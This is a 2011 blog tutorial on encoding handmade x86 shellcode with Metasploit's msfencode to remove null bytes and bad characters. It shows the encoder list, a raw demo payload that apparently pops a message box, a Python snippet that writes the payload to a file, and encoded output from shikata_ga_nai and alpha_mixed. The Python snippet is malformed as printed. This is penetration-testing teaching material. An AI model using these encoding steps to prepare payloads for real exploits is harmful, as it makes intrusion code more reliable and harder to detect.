Monday, October 17, 2011

Encoding your handmade shell code using Metasploit Encoder

Encoding of shell code is important in real time exploitation b'coz,when you create a shell code that shell code may contain some bad characters,null bytes.Either the transmission protocol, or the end application
can be sensitive to "bad characters" which can break your shellcode in various ways.
Bad characters can mostly be eliminated by encoding the payload.

If you are using shell code present in Metasploit framework,then you dont have to concentrate on shell code encoding.Metasploit by default encode the shell code when you are using in the exploitation.
But in many situation when you are using your own shell code in exploits then the shell code must be bad character free.
So to do that you can use Metasploit to encode your handmade shellcode.

To get a list of all encoders present in metasploit framework by running the ./msfencode -l command.
root@bt:~#./msfencode -l -a x86 

Framework Encoders (architectures: x86)
=======================================

Name                    Rank       Description
----                    ----       -----------
generic/none            normal     The "none" Encoder
x86/alpha_mixed         low        Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper         low        Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower  manual     Avoid UTF8/tolower
x86/call4_dword_xor     normal     Call+4 Dword XOR Encoder
x86/countdown           normal     Single-byte XOR Countdown Encoder
x86/fnstenv_mov         normal     Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive   normal     Jump/Call XOR Additive Feedback Encoder
x86/nonalpha            low        Non-Alpha Encoder
x86/nonupper            low        Non-Upper Encoder
x86/shikata_ga_nai      excellent  Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit   manual     Single Static Bit
x86/unicode_mixed       manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper       manual     Alpha2 Alphanumeric Unicode Uppercase Encoder
The default encoder in Metasploit is x86/shikata_ga_nai

Suppose you have just written the follwoing shell code
"\x68\x6c\x61\x6e\x00\x68\x43\x6f"
"\x72\x65\x89\xe3\x68\x61\x6e\x20"
"\x00\x68\x6f\x72\x65\x6c\x68\x62"
"\x79\x20\x43\x68\x6e\x65\x64\x20"
"\x68\x6e\x20\x70\x77\x68\x20\x62"
"\x65\x65\x68\x68\x61\x76\x65\x68"
"\x59\x6f\x75\x20\x89\xe1\x31\xc0"
"\x50\x53\x51\x50\x50\xbe\xea\x07"
"\x45\x7e\xff\xe6\x31\xc0\x50\xb8"
"\x12\xcb\x81\x7c\xff\xe0";
So to encode the shell code first you have to write the shell code into a binary file.So to do that you can choose any scripting langugae.

Here i will use python.
shell = ("\x68\x6c\x61\x6e\x00\x68\x43\x6f
\x72\x65\x89\xe3\x68\x61\x6e\x20
\x00\x68\x6f\x72\x65\x6c\x68\x62
\x79\x20\x43\x68\x6e\x65\x64\x20
\x68\x6e\x20\x70\x77\x68\x20\x62
\x65\x65\x68\x68\x61\x76\x65\x68
\x59\x6f\x75\x20\x89\xe1\x31\xc0
\x50\x53\x51\x50\x50\xbe\xea\x07
\x45\x7e\xff\xe6\x31\xc0\x50\xb8
\x12\xcb\x81\x7c\xff\xe0")
file = open('shellcode.bin','w')
file.write(shell)
file.close()


After running the script you will get a shell.bin file.Now you are almost done.You just have to fire msfencode to encode the shell code for you.

root@bt:~#./msfencode -b '\x00' -i /pentest/exploits/shellcode.bin -t c
[*] x86/shikata_ga_nai succeeded with size 105 (iteration=1)

unsigned char buf[] =
"\xdb\xc9\x29\xc9\xbf\x63\x07\x01\x58\xb1\x14\xd9\x74\x24\xf4"
"\x5b\x83\xc3\x04\x31\x7b\x15\x03\x7b\x15\x81\xf2\x69\x34\x24"
"\x93\x69\xac\xe5\x04\x18\x49\x60\x39\xb4\xf0\x1c\x9e\x45\x9b"
"\x8f\xac\x20\x37\x27\x33\xd2\xe7\xf4\xdb\x4a\x8d\x9e\x3b\xfb"
"\x23\x7e\x4c\x8c\xd3\x5e\xce\x17\x41\xf6\x66\xb9\xff\x63\x1f"
"\x60\x6f\x1e\xff\x1b\x8e\xd1\x3f\x4b\x02\x40\x90\x3c\x1a\x88"
"\x17\xf8\x1c\xb3\xfe\x33\x21\x1b\x47\x21\x6a\x1a\xcb\xb9\x8c";
So this is the Bad character and Null free fully working shell code.

Encode using x86/alpha_mixed

root@bt:~#./msfencode -e x86/alpha_mixed -b '\x00' -i /pentest/exploits/shellcode.bin -t c
[*] x86/alpha_mixed succeeded with size 218 (iteration=1)

unsigned char buf[] =
"\x89\xe3\xda\xc3\xd9\x73\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x43\x58\x42\x4c\x45\x31\x42\x4e\x45\x50\x42\x48\x50\x43\x42"
"\x4f\x51\x62\x51\x75\x4b\x39\x48\x63\x42\x48\x45\x31\x50\x6e"
"\x47\x50\x45\x50\x45\x38\x50\x6f\x43\x42\x43\x55\x50\x6c\x51"
"\x78\x43\x52\x51\x69\x51\x30\x43\x73\x42\x48\x50\x6e\x45\x35"
"\x50\x64\x51\x30\x45\x38\x42\x4e\x45\x70\x44\x30\x50\x77\x50"
"\x68\x51\x30\x51\x72\x43\x55\x50\x65\x42\x48\x45\x38\x45\x31"
"\x43\x46\x42\x45\x50\x68\x42\x79\x50\x6f\x44\x35\x51\x30\x4d"
"\x59\x48\x61\x45\x61\x4b\x70\x42\x70\x46\x33\x46\x31\x42\x70"
"\x46\x30\x4d\x6e\x4a\x4a\x43\x37\x51\x55\x43\x4e\x4b\x4f\x4b"
"\x56\x46\x51\x4f\x30\x50\x50\x4d\x68\x46\x72\x4a\x6b\x4f\x71"
"\x43\x4c\x4b\x4f\x4d\x30\x41\x41";